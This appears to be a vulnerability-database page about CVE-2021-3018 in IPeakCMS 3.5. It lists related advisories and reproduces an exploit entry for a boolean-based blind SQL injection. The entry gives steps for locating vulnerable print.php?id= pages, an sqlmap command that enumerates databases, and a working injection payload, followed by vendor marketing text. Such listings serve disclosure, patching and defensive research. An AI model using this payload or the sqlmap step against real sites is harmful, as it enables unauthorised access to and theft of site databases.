| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs | 25 Jul 202412:00 | – | ics | |
| CVE-2021-3018 | 1 Jun 202102:57 | – | circl | |
| Ipeak Ibexwebcms SQL Injection Vulnerability | 5 Jan 202100:00 | – | cnnvd | |
| Ipeak Infosystems IbexwebCMS SQL Injection (CVE-2021-3018) | 16 Feb 202100:00 | – | checkpoint_advisories | |
| CVE-2021-3018 | 5 Jan 202104:37 | – | cve | |
| CVE-2021-3018 | 5 Jan 202104:37 | – | cvelist | |
| EUVD-2021-26371 | 7 Oct 202500:30 | – | euvd | |
| IPeakCMS 3.5 - SQL Injection | 3 Jun 202606:04 | – | nuclei | |
| CVE-2021-3018 | 5 Jan 202105:15 | – | nvd | |
| IPeakCMS 3.5 SQL Injection | 6 Jan 202100:00 | – | packetstorm |
# Exploit Title: IPeakCMS 3.5 - Boolean-based blind SQLi
# Date: 07.12.2020
# Exploit Author: MoeAlbarbari
# Vendor Homepage: https://ipeak.ch/
# Software Link: N/A
# Version: 3.5
# Tested on: BackBox Linux
# CVE : CVE-2021-3018
Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print e.g: site.com/cms/print.php?id=1
Parameter: id (GET based)
Use SQLmap if you've found the valid id...
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs
Payload : id=(SELECT (CASE WHEN(3104=3104) THEN 1 ELSE (SELECT 8458) END))Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation